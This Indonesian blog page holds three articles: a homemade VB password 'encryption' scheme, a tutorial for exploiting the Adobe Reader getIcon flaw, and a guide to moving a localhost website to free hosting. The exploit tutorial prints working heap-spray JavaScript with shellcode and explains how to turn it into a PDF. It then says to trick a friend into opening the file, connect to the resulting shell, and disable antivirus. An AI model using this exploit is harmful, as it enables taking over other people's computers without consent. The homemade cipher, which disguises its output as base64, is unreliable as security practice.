Source Code Program Enkripsi Sederhana dengan VB

aligncenterPenulis Artikel : KingFalcon

Di artikel ke-3 ini saya akan share script enkripsi sederhana yang saya buat dalam satu malam (bukan cinta satu malam, khusus dewasa). Ini saya buat awalnya untuk sistem member di warnet teman saya, tetapi atas rekomendasi teman saya yang lain, akhirnya dia pakai RC4(untung bukan enkripsi buatan saya ini, karena masih jelek).

To the point aja, untuk yang mau download bisa download di Triangle_Encryption-maknyos.com.rar – 8 Kb.

Karena script nya terlalu singkat, jadi saya tambah beberapa code untuk mempercantik tampilan.

Dalam script ini, saya membuat 3 fungsi enkripsi dan sebagai outputnya akan ada 2 pilihan, yaitu “1/block encryption” dan “2/block encryption”. Maksudnya untuk yang pertama, password akan dibagi kedalam beberapa bagian dan setiap bagian memiliki 1 karakter. Sedangkan yang kedua, password akan dibagi kedalam beberapa bagian dan setiap bagian memiliki 2 karakter. Jika ternyata jumlah password itu ganjil, maka akan ditambah satu karakter yaitu “A”.

Saya beri script enkripsi ini nama “Triangle Encryption” karena di script ini ada beberapa rumus matematika tentang segitiga. Contohnya pada variable “S3″, itu rumus mencari sisi miring pada segitiga siku-siku atau lebih dikenal dengan rumus pitagoras(bener gak ya, nulisnya). Dan juga ada rumus luas segitiga dan keliling nya(masing-masing dalam variable “L” dan “K”). Dan selebih nya, itu adalah kreasi saya sendiri.

Untuk menggunakannya, cukup tuliskan :

ENCRYPT(password, type)

Edit password dengan password yang ingin di enkripsi dan type dengan tipe enkripsi(0 untuk enkripsi 1/block encryption atau 1 untuk 2/block encryption).

Untuk hasil akhir enkripsi, saya menambahkan karakter “==” di akhir (jika jumlah huruf kurang dari 15) untuk menipu orang lain dan akan mengira password nya di enkripsi dengan base64.

Untuk dekripsinya, saya belum menemukan, tetapi saya akan mencoba mencarinya untuk enkripsi 1/block encryption (untuk yang 2, mungkin akan cukup menyulitkan).

Artikel ini merupakan salinan dari blog pribadi saya di Blog Pribadi King Falcon.

sumber: www.xcode.or.id
Read More..

Tutorial Hacking Acrobat Reader get_icon Exploit

Penulis Artikel : Kurniawan Founder Yogyafree XCode

Asal mula celah keamanan get_icon pada Adobe Acrobat dan pembuat aslinya :

Affected Version : Acrobat Reader 8.1.2 – 9.0
Vendor Patch : http://www.adobe.com/support/security/bulletins/apsb09-04.html
Tested On : XP SP2 / SP3

from ZDI : http://www.zerodayinitiative.com/advisories/ZDI-09-014/

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file.The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow.

If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.

This vulnerability was discovered by:

Tenable Network Security (there is a man named Nicolas Pouvesle and we know == > he has lots of exploitation method ; ))
Exploit By : www.Abysssec.com

Tutorial ini berbeda dengan salah seorang yang memberitahukan ke penulis tentang adanya exploit Arcobat Reader get_icon exploit yang sudah dalam bentuk jadi, waktu itu ditunjukkan di urlnya k*****s yang kemudian setelah itu saya modifikasi lalu kemudian saya seminarkan pada tahun 2009 bersamaan dengan teknik-teknik hacking lainnya. Karena sesuatu hal jika saya share lagi “scriptnya” dimungkinkan dia keberatan walaupun sudah saya modifikasi. Maka disini saya menggunakan teknik dari saya sendiri.

Teknik ini saya gabungkan dari shellcode exploit IE7 yang didapat milw0rm (www.milw0rm.com) dengan salah satu teknik yang dipakai abhilyall (www.hackforums.net). Dan tidak ada comotan script yang bersangkutan yang saya masukkan script ini. Jadi yang mau pakai silah-silahkan saja, bebas kok.

Pertama : anda Copy aja saja source code ini lalu pastekan ke notepad.

—————————- potong disini ——————————–

function spary(){
var shellcode = unescape(“%uc931%ue983%ud9a2%ud9ee%u2474%u5bf4%u7381%u5b13%ueec2%u83f8%ufceb%uf4e2%ud2b0%u ? b2b4%u0b68%u4188%uc367%ucc6e%u5b51%u020c%uc7b0%u1306%u3da4%u8811%u5b17%u6177%u3f ? 98%u51d6%u5bc2%uea77%u5782%u11fc%uf6de%u21fc%ud0ca%ueaaf%u67b1%u15fc%u23dc%u9274 ? %u2549%u6257%ud039%u7539%ub6f1%u3621%ud093%u6248%ud039%u0b85%u02cc%uc784%u53b6%u ? 3e2e%u9c41%u2473%ub220%u3e2e%ud09c%ueaba%u7f84%ua274%uba13%ua074%u92f1%uea11%ud0 ? ca%u7d31%u98c1%u80b6%u58c0%ueab6%u58c2%ueab4%ud038%ue280%u5504%ub1fc%u5fa8%u892e ? %u5b92%u6177%u9d41%u337a%ua494%u9d20%ud098%u0baf%u02c3%u5c9f%u5bc2%ue277%u4804%u ? 2721%u6542%u14f7%udb38%ue141%ud89c%u419b%u8749%u411d%ua491%u8d20%u5f05%u3d74%u75 ? a3%ua612%u5886%u1973%u5ba7%u5277%u0b02%u3227%u0b94%u3688%ud03e%u31ab%ua491%u9120 ? %ua492%u9520%u9bf1%ue4db%u2e02%u308e%u0d90%u9e24%u0110%uca2e%ub520%ua144%ub301%u ? 9e51%ua43d%u0430%u0bb6%u0e05%u1aa1%u0513%u3eb0%u1204%u1cc2%u1512%u2291%u1504%u36 ? a7%u0833%u3eb0%u1514%u29ad%u200e%u0cc2%u0f1e%u2387%u0212%u1ec2%u080f%u0fb6%u131f ? %u3aa7%u6113%u348e%u0516%u328e%u1315%u29a3%u200e%u2ec2%u0d05%u34af%u6119%u0997%u ? 253b%u2cad%u0d19%u3aad%u3513%u1dad%u0d1e%u1aa7%u9077%ub62f%uc29e%ued74%u8d85%ua3 ? 36%u8b9c%uac34%ud687%uab28%u9d9a%uae28%u9c8b%ua175%u9581%ua074%u9dc0%ua723%uf86e ?”);
garbage = unescape(“%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3″) + shellcode;
nopblock = unescape(“%u9090%u9090″);
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0×40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<180;i++) memory[i] = block + garbage; var buffersize = 4012; var buffer = Array(buffersize); for (i=0; i { buffer[i] = unescape(“%0a%0a%0a%0a”); } Collab.getIcon(buffer+’_N.bundle’); } spary(); ————— potong disini ———————– Lalu simpan dengan nama file hackpdf.txt Seperti ini dibawah ini :

 Lalu Download Python : http://www.python.org/ftp/python/2.6.1/python-2.6.1.msi lalu install setelah maka download http://www.didierstevens.com/files/software/make-pdf_V0_1_1.zip lalu extract ke c:\python26 Di directory c:\python ketik : c:\python26>make-pdf-javascript.py -f hackpdf.txt hackpdf.pdf



Setelah menjadi file PDF silahkan upload ke web anda suruh teman anda buka dengan Acrobat Reader 8.1.2 – 9.0 lalu anda masuk ke Putty ( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )

Masukkan ip addreas teman anda dalam putty lalu pilih telnet lalu masukkan port 5500 lalu jalankan.

Hasilnya anda akan mendapatkan shell :.



Exploit seperti ini terdeteksi oleh Antivirus, pastikan antivirus gak aktif.

Sebagai tambahan bagi yang pernah mendapatkan script yang fungsinya seperti ini yang di dapat dari saya jaman dahulu maka anda dapat menghapusnya dari komputer anda, daripada nanti menimbulkan masalah ke anda, karena saya sudah menghapus script dari yang bersangkutan dari komputer saya. Sebagai gantinya anda dapat menggunakan teknik dan script ini.

Sehingga jika saya mengisi seminar atau di event saya sudah tidak menggunakan script yang isunya katanya milik yang bersangkutan, tapi saya menggunakan teknik cara berbeda yang saya tulis diatas dengan sumber yang sudah disebutkan.

Bagi yang lain jika ingin mengisi seminar, workshop atau lainnya boleh saja menggunakan tutorial dan script ini karena sudah saya licensikan ke YFX.

Bagi yang ingin mendownload paket lengkapnya :

http://rapidshare.com/files/405002909/hackpdf.zip tapi hanya bisa di download sebanyak 10x, sehingga share kembali setelah anda mendapatkannya.

Script seperti ini sudah ada juga di Metasploit Framework 3.4, jadi dapat menjadi alternatif selain menggunakan ini.

By Kurniawan


sumber: www.xcode.or.id Read More..

Cara online-kan Website dari Localhost

July 14th, 2010 | Author: H4nk

Artikel ini di buat untuk rekan2 yang kurang paham tentang cara mengonlinekan website. Jika di pikir emang susah kayaknya, tapi kalau dah di coba gampang kok. Ngk percaya mari kita coba. Ikuti langkah2 ini dengan benar (kalau ada kesalahan hubungi penulis di XmoenseN@gmail.com )

Tak kenal maka tak sayang, sebelum mengonlinekan website lebih baik kita mengerti apa itu website dan apa itu blog.sebelumnya bahasa yang saya gunakan adalah bahasa yang kurang formal, karena saya tidak suka formal2 bgt…. Dengan tujuan sama kok.. kalau beda perngertian dengan apa yang anda dapat dari kampus itu biasa kok, asalkan tujuan nya sama. Tidak satu jalan menuju padang loh. Masih bisa lewat darat, udara atau laut ( pepatah baru )

Antara web dengan blog bisa di artikan begini : blog sudah tentu web, tapi web belum tentu blog. Puyeng ea ? sama saya juga pusing menjelaskannya. Trus kata apa yg bisa di pahami oleh newbie seperti saya ini.

WEBSITE

Secara kamus nih, ngk tau dapat kamus dari mana, website terdiri kata web dan site. Yang mana web itu sendiri kependekan dari World Wide Web ( Di singkat WWW ). Sering lihat tulisan www tersebutkan, contohnya : http://www.facebook.com, http://www.google.com, http://www.xcode.or.id, namun sudah terlanjur dari sononya dipakai secara umum penulisannya menjadi website, ngak mungkin kita menulisnya apakah anda punya www, kan ngak enak di dengarnya. Jadi enaknya apakah anda punya website J.

Ada yang mengatakan website terdiri dari beberapa blok atau module atau bilik2 file, semoga anda paham ea, saya juga bingung menjelaskannya karena itu silahkan cari sendiri di sini

Sekarang blog
Yang jelas blog tidak memakai www, contoh blog adalah http://xmoensen.wordpress.com

Sebenarnya kata blog berasal dari WEB LOG adalah bentuk web yang menyerupai tulisan-tulisan ( yang di muat sebagai posting ) pada sebuah halaman web umum atau coretan-coretan yang punya blog, seperti blog saya ini . Tulisan diblog dimuat selalu terbalik ( isi terbaru dahulu baru kemudian diikuti dengan isi yang lebih lama) tapi ingat ngk semua seperti itu tapi kebanyakan, nanti ada blog yang ngk sesuai seperti itu ntar di salahkan saya L.. Blog biasanya di kelola oleh pribadi atau seorang dan dapat di akses oleh semua orang oleh pengguna internet dengan topic dan tujuan dari si pengguna blog tersebut. Sampai di sini anda paham apa yang di maksud dengan blog dan website.

Sekarang perbedaan domain dan hosting.. masa mau online-kan website ngka tau yang mana domain dan yang mana hosting. Saya ngak mengatakan bahwa anda orang seperti itu, lebih baik jujur dari pada malu nantinya, saya akui dahulu juga ngak tahu apa yang dimaksud dengan domain dan hosting, mungkin semua orang begitu.. oleh karena itu kita sharing dan sharing biar semuanya yang ngk tahu bisa tahu J.

Antara domain dan hostingan bisa di ibaratkan di manusia seperti ini :

Domain itu ibaratkan Nama seseorang, dan hosting adalah jiwa raga atau tubuhnya manusia. Contoh tanpa nama anda bisa hidup ? tentu anda bisa hidup. Tapi apakah orang bisa memanggil anda, contoh saya nama H4nk kalau ngk ada nama H4nk orang memanggil saya dengan sebutan anak (nama Bapak).jadi susahkan bisa jadi anda tidak ada yang mau orang memanggil anda. Nah di perlukan nama biar semua orang bisa ingat sama kita, dan hosting juga bergitu ibaratkan jiwa raga/tubuh. Pernah dengar kata pepatah : manusia mati meninggalkan nama, nah sama juga dengan sebuah web, jika hostinganya tutup hanya tinggal nama doank J. Mengertikan apa yang di maksudkan. Moga aja mengerti. Kalau ngk mengerti silahkan googling lagi J.

Dalam artikel ini kita akan menggunakan hostingan free dan domain free ( karena belum bayar domain dan hostingan yang berbayar L belum punya duit L )

Domain yang saya gunakan adalah : http://www.uni.cc

Jika anda sudah masuk kedalam websitenya, saatnya anda cek domain yang akan anda pakai, semua ini sama dengan jasa domain yang lain..

Masukan nama anda yang akan di gunakan, contoh di sini adalah H4nk

Jika ada pesan The domain name is available! Berarti nama tersebut bisa di gunakan, tapi jika pesannya seperti ini :

The domain is already taken bearti nama tersebut sudah di gunakan oleh orang lain, silahkan cari yang lain

Jika sudah klik Register dan anda akan di bawa ke tampilan seperti ini :

Masukan email anda dan cetang I accept the Terms of service dan masukan kode security yang ada dalam kotak.

Lalu lanjutkan continue >

Jika benar isi semua form yang ada…

Jika sudah buka email anda dan lakukan aktivasi dari email, karena aktifasi di kirimkan ke email..

Klik Click here to activate your account. Jika melakukan aktifasi atau melakukan signup activate dengan memasukan activasi code dan password untuk melakukan login adalah yang di bagian bawah karena password dikirmkan juga ke email.

Jika sudah masuk kembali ke webnya maka akan ada tampilan

Maka akan ada from seperti gambar di bawah ini :

Sampai di sini biarkan dulu, saatnya masuk ke hostingan, di sini saya menggunakan hostingan free dari http://www.0007webs.com

Tampilan dari http:///www.007webs.com adalah seperti gambar dibawah ini :

Lakukan register dengan cara klik bagian atas register atau klik JOIN FREE

Isi from dengan benar

Jika sudah periksa email anda, maka akan ada kiriman aktifasi ke email :

Klik link yang ada di email tersebut…

Dan ada juga kiriman email tentang data anda seperti berikut

Data tersebut adalah username, password, dan login via FTP atau alamat login. Sekarang coba login ke dalam hostingan anda tadi.dan masuk ke control panelnya

Klik Account settings

Pada bagian Extra domain terlihat nama servernya adalah :

Nameservers: ns1.007webs.com, ns2.007webs.com

Masukan pada domain anda yang kolom 2 tadi yang kosong dengan:

Nameserver #1: ns1.007webs.com

Nameserver #2: ns2.007webs.com

Save di domain tersebut dengan server yang di berikan oleh pihak hostingan.

Jika sudah tunggu beberapa jam nanti domain akan melakukan aktifasi dns server hostingan.

Sekarang kembali ke hostingan, klik Create / delete MySQL database untuk membuat database

Buat nama database, user, dan password dari database tersebut.

Untuk user pertama akan di berikan hak full akses. Dan user kedua bisa di tentukan hak aksesnya. Jika semua benar, saatnya upload database anda yang tadinya di localhost ke database hosting.dengan cara klik phpmyadmin di control panel.

Jangan lupa melakukan konfigurasi pada web yang anda buat. Sesuaikan dengan nama database di hostingan dan usernya dan password. Untuk host kebanyakan hosting bisa menggunakan localhost, jika tidak bisa menggunakan localhost pihak hostingan akan memberikan host untuk database.

Jika database sudah di upload saatnya upload file web anda dengan melalui FTP, tadi di email di berikan link FTP nya yaitu : ftp://xmoensen.007webs.com

Di sini saya menggunakan FileZilla bisa anda dapatkan di http://www.4shared.com/account/file/uQcb0yfk/FileZillaPortable.html

Pada bagian atas masukan host yang di berikan oleh pihak hostingan username dan password. Dan untuk port masukan port 21 ( port standart FTP )

Pilih file yang akan anda upload ke hostingan. Pada kolom sebelah kanan adalah diktori yang ada di hostingan dan sebelah kiri adalah diktori komp anda.

Sebelumnya anda hapus file index.html yang ada di hostingan anda sebelum upload, karena index.html adalah file bawaan hostingan..

Jika benar maka web anda siap di akses seluruh dunia maupun di luar angkasa J

Jika sukses saatnya web anda di promosikan ke teman2 anda, dan jangan lupa kunjungi blog jelek ini ea, dan saling tukar2 link..

sumber: www.xcode.or.id Read More..